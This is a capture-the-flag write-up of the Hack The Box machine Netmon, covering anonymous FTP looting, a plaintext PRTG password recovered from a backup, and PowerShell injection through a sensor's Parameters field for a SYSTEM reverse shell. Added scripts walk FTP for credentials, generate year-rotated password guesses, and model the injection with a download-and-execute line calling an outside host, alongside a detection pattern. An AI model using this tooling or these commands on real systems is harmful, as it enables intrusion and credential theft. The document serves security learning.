Netmon - Hack The Box
I think Netmon had the quickest first blood on HTB yet. The user flag could be grabbed by just logging in over anonymous FTP and retrieving it from the Public user directory. I guessed the PRTG admin password after finding an old configuration backup and changing the year at the end of the password from 2018 to 2019. Once inside PRTG, I got RCE as SYSTEM by creating an EXE/Script sensor and injecting Nishang's reverse shell one-liner through its Parameters field.
Summary
- We can log in with anonymous FTP and get the user.txt flag directly from the Public user folder
- There's a PRTG configuration backup containing an old password that we can download from FTP
- The PRTG password is almost the same as the one found in the old backup, but it ends with 2019 instead of 2018
- We can get RCE using PowerShell code injected into the Parameters field of an EXE/Script sensor in PRTG
Detailed steps
Nmap scan
The nmap scan shows that anonymous FTP is allowed and that PRTG Network Monitor 18.1.37 is running on the web server on port 80.
# nmap -sC -sV -F 10.10.10.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 22:43 EST
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.0090s latency).
Not shown: 95 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Free flag from FTP
In the nmap scan, the ftp-anon script identified that the FTP server allows anonymous access, and the directory listing it returned (inetpub, Users, Windows, ...) shows the FTP root is the whole C: drive rather than a restricted ftproot directory. Because we can look around the entire disk of the box, I quickly found a user.txt flag in the c:\users\public folder.
# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd /users/public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
02-02-19 11:35PM 33 user.txt
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> type binary
200 Type set to I.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
33 bytes received in 0.01 secs (4.5173 kB/s)
ftp> exit
221 Goodbye.
root@ragingunicorn:~/htb/netmon# cat user.txt
dd58c...
I was too slow for first blood, someone else on HTB got user blood in under 2 minutes.
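Since the FTP root is the whole drive, the fastest way to find loot like user.txt or the PRTG backups below is to walk it once and flag interesting file names. The following is an added example (not the author's tooling): a parser for the Microsoft ftpd LIST format shown above, a recursive ftplib walker that skips the huge Windows and PerfLogs trees, and an "interesting name" heuristic. The sample listing, the skip list and the interesting-name patterns are constructed assumptions, not anything PRTG or the box defines.

```python
"""Walk an anonymous FTP server that exposes a whole Windows volume and flag
interesting files. Added example, not the author's tooling. The LIST parser
targets the Microsoft ftpd DIR format seen in the post; the sample listing is
constructed from the shape of the post's `dir` output."""
import re
from ftplib import FTP, error_perm

# Microsoft ftpd DIR line: "02-02-19 11:35PM                   33 user.txt"
MS_LIST_RE = re.compile(
    r"^(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(.+)$"
)

# File names worth a second look on a Windows host (assumed list, not exhaustive).
INTERESTING = re.compile(
    r"(^(user|root)\.txt$|\.(bak|old|dat|config|ini|kdbx|ps1)$|password|"
    r"credential|unattend|web\.config)",
    re.IGNORECASE,
)

# Directories we never descend into on a first pass: huge and rarely useful.
SKIP_DIRS = {"windows", "perflogs", "$recycle.bin"}


def parse_ms_listing(lines):
    """Return (name, is_dir, size) tuples from Microsoft ftpd LIST output."""
    entries = []
    for line in lines:
        m = MS_LIST_RE.match(line.strip())
        if not m:
            continue  # banner or unparsable line
        size_or_dir, name = m.group(3), m.group(4)
        is_dir = size_or_dir == "<DIR>"
        entries.append((name, is_dir, 0 if is_dir else int(size_or_dir)))
    return entries


def is_interesting(name):
    return bool(INTERESTING.search(name))


def walk(ftp, path="/", max_depth=4, _depth=0):
    """Recursively LIST `path` over an open ftplib.FTP session and yield
    (full_path, size) for interesting files. Depth-limited so a whole drive
    does not turn into hours of LISTs."""
    if _depth > max_depth:
        return
    lines = []
    try:
        ftp.cwd(path)
        ftp.retrlines("LIST", lines.append)
    except error_perm:
        return  # not readable for anonymous; move on
    for name, is_dir, size in parse_ms_listing(lines):
        full = path.rstrip("/") + "/" + name
        if is_dir:
            if name.lower() not in SKIP_DIRS:
                yield from walk(ftp, full, max_depth, _depth + 1)
        elif is_interesting(name):
            yield full, size


# Constructed sample in the shape of the post's `dir` output.
SAMPLE_LISTING = """\
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
02-02-19  11:35PM                   33 user.txt
"""


def sample_hits():
    """Interesting file names from the constructed listing (offline demo)."""
    return [n for n, d, _ in parse_ms_listing(SAMPLE_LISTING.splitlines())
            if not d and is_interesting(n)]


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.152"
    with FTP(host, timeout=10) as ftp:
        ftp.login()  # anonymous login, no password needed
        for full, size in walk(ftp):
            print(f"{size:>10} {full}")
```

Run it with the target host as the first argument; with no host it defaults to the box IP from the post. On this box both user.txt and the three PRTG Configuration.* files under ProgramData match the heuristic.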
Getting access to PRTG
The PRTG web interface is running on port 80. I tried the default credentials prtgadmin / prtgadmin but got access denied.
Looking around the filesystem over FTP, I found that the configuration directory for PRTG is under c:\programdata\paessler.
ftp> cd /programdata
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19 11:15PM <DIR> Licenses
11-20-16 09:36PM <DIR> Microsoft
02-02-19 11:18PM <DIR> Paessler
Inside Paessler\PRTG Network Monitor, I found the current configuration file, a .old copy of it, and a .old.bak backup dated July 2018, i.e. from last year.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
[...]
02-25-19 09:54PM 1189697 PRTG Configuration.dat
03-02-19 05:33PM 1198465 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
The PRTG Configuration.dat config file contains the credentials for user prtgadmin, but the password is stored in what seems to be a proprietary encrypted (or hashed?) form, so it's of no direct use. When I checked PRTG Configuration.old.bak, however, I found the dbpassword value in clear text: PrTg@dmin2018.
I tried this password with user prtgadmin on the PRTG login page but it didn't work. Then I realized that this is from a 2018 backup; maybe the admin is lazy, re-used the dbpassword for the admin account and simply bumped the year to the current one (2019).
My guess was correct and I was able to log in with the password PrTg@dmin2019.
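The two steps above (pull every credential-looking value out of a PRTG config backup, then try the obvious year rotation) are easy to script. The following is an added example, not from the post or from Paessler. PRTG configs are XML, but the exact layout of the sample below (a `dbpassword` element with an XML comment naming the user) is modelled on what the post reports and is an assumption, not a spec; the sample file is constructed.

```python
"""Extract credential-looking values from a PRTG configuration file and
derive year-rotated guesses. Added example, not from the post or Paessler.
The sample's tag layout is an assumption; real files are ~1 MB of XML."""
import re
import sys

# Constructed sample in the shape of "PRTG Configuration.old.bak".
SAMPLE_BACKUP = """\
<?xml version="1.0" encoding="UTF-8"?>
<data version="18.1.37.13946">
  <basenode>
    <data>
      <dbcredentials>
        <!-- User: prtgadmin -->
        prtgadmin
      </dbcredentials>
      <dbpassword>
        <!-- User: prtgadmin -->
        PrTg@dmin2018
      </dbpassword>
    </data>
  </basenode>
</data>
"""

# Any element whose name hints at a secret; the text between the tags is captured.
SECRET_TAG_RE = re.compile(
    r"<(?P<tag>[a-z0-9_]*(?:password|passwd|pwd|credential|secret)[a-z0-9_]*)>"
    r"(?P<body>.*?)</(?P=tag)>",
    re.IGNORECASE | re.DOTALL,
)
XML_COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
TRAILING_YEAR_RE = re.compile(r"^(.*?)((?:19|20)\d{2})$")


def extract_secrets(text):
    """Return (tag, comment, value) for every secret-looking element.
    Comments are kept separately because PRTG uses them to label the owner."""
    found = []
    for m in SECRET_TAG_RE.finditer(text):
        body = m.group("body")
        comments = " ".join(c.strip() for c in XML_COMMENT_RE.findall(body))
        value = XML_COMMENT_RE.sub("", body).strip()
        # Nested markup (the live .dat wraps hashed values in child elements)
        # means the value is not usable as a password; keep it but mark it.
        if "<" in value:
            value = "(non-plaintext) " + re.sub(r"\s+", " ", value)
        found.append((m.group("tag"), comments, value))
    return found


def year_variants(password, years):
    """If `password` ends in a four-digit year, return copies with that year
    swapped for each candidate in `years`; otherwise return an empty list."""
    m = TRAILING_YEAR_RE.match(password)
    if not m:
        return []
    stem, old = m.groups()
    return [f"{stem}{y}" for y in years if str(y) != old]


def candidates_from_config(text, years=(2019, 2020)):
    """Plaintext secrets plus their year-rotated guesses, deduplicated,
    ready to feed to a login attempt."""
    out = []
    for _tag, _comment, value in extract_secrets(text):
        if value.startswith("(non-plaintext)"):
            continue
        for pw in [value] + year_variants(value, years):
            if pw not in out:
                out.append(pw)
    return out


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
            data = f.read()
    else:
        data = SAMPLE_BACKUP
    for tag, comment, value in extract_secrets(data):
        print(f"{tag:<14} {comment:<20} {value}")
    print("guesses:", candidates_from_config(data))
```

Point it at the downloaded PRTG Configuration.old.bak; the current PRTG Configuration.dat will only yield entries marked non-plaintext, which is exactly the difference the post hit. The year rotation is deliberately narrow (current and next year): if the stem itself changed, you are back to guessing.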
RCE through PRTG sensors
PRTG is a monitoring tool that supports a whole suite of sensors, like ping, HTTP, SNMP, etc. The server itself is already in the device list, so we can add sensors to it:
I clicked Add Sensor on the 10.10.10.152 device and selected the EXE/Script sensor.
We can't add our own PowerShell script because we don't have write access to the application directory the sensor loads scripts from, but we can leverage the Parameters field to append additional code to the command line of an existing PowerShell script: PRTG hands the field to PowerShell together with the script invocation, so a leading semicolon terminates the script call and whatever follows runs as a new statement. I used Nishang to get a reverse shell: a semicolon at the beginning of the Parameters field, then the Nishang one-liner pasted after it.
After the sensor is created, we hit the play button to run a scan immediately.
Because EXE/Script sensors are executed by the PRTG probe service, which runs as LocalSystem by default, we get a shell as nt authority\system. Box done!
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.152] 55751
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> type c:\users\administrator\desktop\root.txt
30189...
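To make the injection point concrete, here is an added example (not Paessler's code and not the author's payload) that models the Parameters field in Python: the vulnerable form concatenates the field into a `powershell -Command "& 'script' <params>"` string, which is an assumed simplification of how PRTG builds the command line; the hardened form passes the script with `-File` and the parameters as separate argv entries, which PowerShell treats as literal strings rather than code, and rejects anything that looks like PowerShell syntax. The same check doubles as a review rule for stored sensor definitions. The reverse shell stub is a constructed stand-in for the Nishang one-liner; nothing here contacts a host.

```python
"""Model of why a leading ';' in an EXE/Script sensor's Parameters field gives
code execution, with a hardened builder and a review check. Added example; the
-Command shape below is an assumption about PRTG, not its real code."""
import re

SCRIPT = r"C:\Program Files (x86)\PRTG Network Monitor\Custom Sensors\EXE\Demo.ps1"

# Constructed stand-in for the Nishang one-liner: only its shape matters here.
REVERSE_SHELL_STUB = (
    "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.23/shell.ps1')"
)


def build_command_vulnerable(script, params):
    """String concatenation into -Command: the parameters become PowerShell
    source, so ';' ends the '& script' call and starts a second statement."""
    return f'powershell.exe -Command "& \'{script}\' {params}"'


# Tokens that end or chain a statement, open a script block, or evaluate code.
INJECTION_RE = re.compile(
    r"[;|&\n`{}]|\$\(|\bIEX\b|Invoke-Expression", re.IGNORECASE
)


def looks_like_injection(params):
    """True when a Parameters value contains anything beyond a plain argument
    list. Usable as a review rule over exported sensor definitions."""
    return INJECTION_RE.search(params) is not None


def build_command_hardened(script, params):
    """Reject injection tokens and pass arguments via -File as separate argv
    entries; PowerShell hands them to the script as strings, never as code.
    Splits on whitespace only, so quoted multi-word arguments are not handled."""
    if looks_like_injection(params):
        raise ValueError("parameters contain PowerShell syntax")
    argv = ["powershell.exe", "-NoProfile", "-NonInteractive", "-File", script]
    argv.extend(params.split())
    return argv


def make_payload(stub=REVERSE_SHELL_STUB):
    """Parameters value in the form the post describes: ';' then the code."""
    return "; " + stub


if __name__ == "__main__":
    payload = make_payload()
    print(build_command_vulnerable(SCRIPT, payload))
    print(looks_like_injection(payload), looks_like_injection("-Host 10.10.10.152"))
    try:
        build_command_hardened(SCRIPT, payload)
    except ValueError as e:
        print("rejected:", e)
    print(build_command_hardened(SCRIPT, "-Host 10.10.10.152 -Count 4"))
```

The defensive takeaway is the second builder: whatever the exact command line PRTG composes, an argument string only stays an argument if it never reaches a `-Command` parser, and a sensor definition whose Parameters field contains `;`, `|`, backticks or `IEX` deserves a look in any PRTG install, since it runs with the probe service's SYSTEM privileges.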